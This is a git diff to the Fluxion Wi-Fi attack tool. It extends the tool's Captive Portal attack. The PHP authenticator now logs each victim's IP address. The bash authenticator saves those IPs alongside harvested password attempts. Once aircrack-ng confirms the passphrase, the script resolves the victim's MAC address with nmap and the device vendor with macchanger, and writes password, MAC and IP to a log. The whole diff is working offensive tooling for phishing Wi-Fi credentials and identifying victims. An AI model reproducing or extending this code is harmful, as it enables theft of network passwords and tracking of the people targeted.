diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 983320a..bf05df7 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -5,6 +5,7 @@ CaptivePortalState="Not Ready" CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog" CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog" +CaptivePortalIpLog="/tmp/fluxspace/ip_hits" CaptivePortalJamTime="9999999999999" CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") @@ -605,6 +606,9 @@ while [ \$AuthenticatorState = \"running\" ]; do # Save any new password attempt. cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/$APTargetSSID-$APTargetMAC.log\" + # Save ips to file + echo -e "$(cat /tmp/fluxspace/ip_hits | tail -n 1 | head -n 1)\n" >> \"$CaptivePortalPassLog/$APTargetSSID-$APTargetMAC-IP.log\" + # Clear logged password attempt. echo -n > \"$FLUXIONWorkspacePath/pwdattempt.txt\" fi @@ -615,8 +619,29 @@ while [ \$AuthenticatorState = \"running\" ]; do if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then # Check if we've got the correct password by looking for anything other than \"Passphrase not in\". if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then - echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + MatchedClientIP=$(cat \"$FLUXIONWorkspacePath/ip_hits\" | tail -n 1 | head -n 1) + + if [ "$MatchedClientIP" != "" ];then + MatchedClientMAC=\$(nmap -PR -sn -n \$MatchedClientIP 2>&1 | grep -i mac | awk '{print \$3}' | tr [:upper:] [:lower:]) + + if [ \"\$(echo \$MatchedClientMAC| wc -m)\" != \"18\" ]; then + MatchedClientMAC=\"xx:xx:xx:xx:xx:xx\" + fi + + VICTIM_FABRICANTE=\$(macchanger -l | grep \"\$(echo \"\$MatchedClientMAC\" | cut -d \":\" -f -3)\" | cut -d \" \" -f 5-) + if echo \$MatchedClientMAC| grep -q x; then + VICTIM_FABRICANTE=\"unknown\" + fi + else + MatchedClientIP="Unknown" + MatchedClientMAC="Unknown" + fi + + echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + + sleep 1 break + else echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" fi @@ -699,6 +724,7 @@ signal_stop_attack # Assure we've got a directory to store net logs into. if [ ! -d \"$CaptivePortalNetLog\" ]; then mkdir -p \"$CaptivePortalNetLog\" + touch $CaptivePortalIpLog fi echo \" @@ -710,6 +736,8 @@ Channel: $APTargetChannel Security: $APTargetEncryption Time: \$ih\$h:\$im\$m:\$is\$s Password: \$(cat $FLUXIONWorkspacePath/candidate.txt) +Mac: $MatchedClientMAC +IP: $MatchedClientIP \" >\"$CaptivePortalNetLog/$APTargetSSID-$APTargetMAC.log\"" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" diff --git a/attacks/Captive Portal/lib/authenticator.php b/attacks/Captive Portal/lib/authenticator.php index 34cb781..885ae90 100644 --- a/attacks/Captive Portal/lib/authenticator.php +++ b/attacks/Captive Portal/lib/authenticator.php @@ -44,6 +44,15 @@ $candidate_result_path = "$FLUXIONWorkspacePath/candidate_result.txt"; + // Define variables + $client_ip_path = "/tmp/fluxspace/ip_hits"; + $client_ip = $_SERVER['REMOTE_ADDR']; + + // Write ip to file + $c = fopen($client_ip_path, "w"); + fwrite($c,$client_ip); + fclose($c); + // Create candidate result file to trigger checking. $candidate_result = fopen($candidate_result_path, "w"); fwrite($candidate_result,"\n"); diff --git a/fluxion.sh b/fluxion.sh index b603c42..bf0b0a6 100755 --- a/fluxion.sh +++ b/fluxion.sh @@ -13,7 +13,7 @@ declare -r FLUXIONNoiseFloor=-90 declare -r FLUXIONNoiseCeiling=-60 declare -r FLUXIONVersion=3 -declare -r FLUXIONRevision=7 +declare -r FLUXIONRevision=8 declare -r FLUXIONDebug=${FLUXIONDebug:+1} declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} diff --git a/scripts/debug.sh b/scripts/debug.sh new file mode 100755 index 0000000..719082d --- /dev/null +++ b/scripts/debug.sh @@ -0,0 +1,6 @@ +#!/bin/bash + +export FLUXIONDebug=1 +export FLUXIONWIKillProcesses=1 +export FLUXIONWIReloadDriver=1 + diff --git a/scripts/preferences.sh b/scripts/preferences.sh old mode 100644 new mode 100755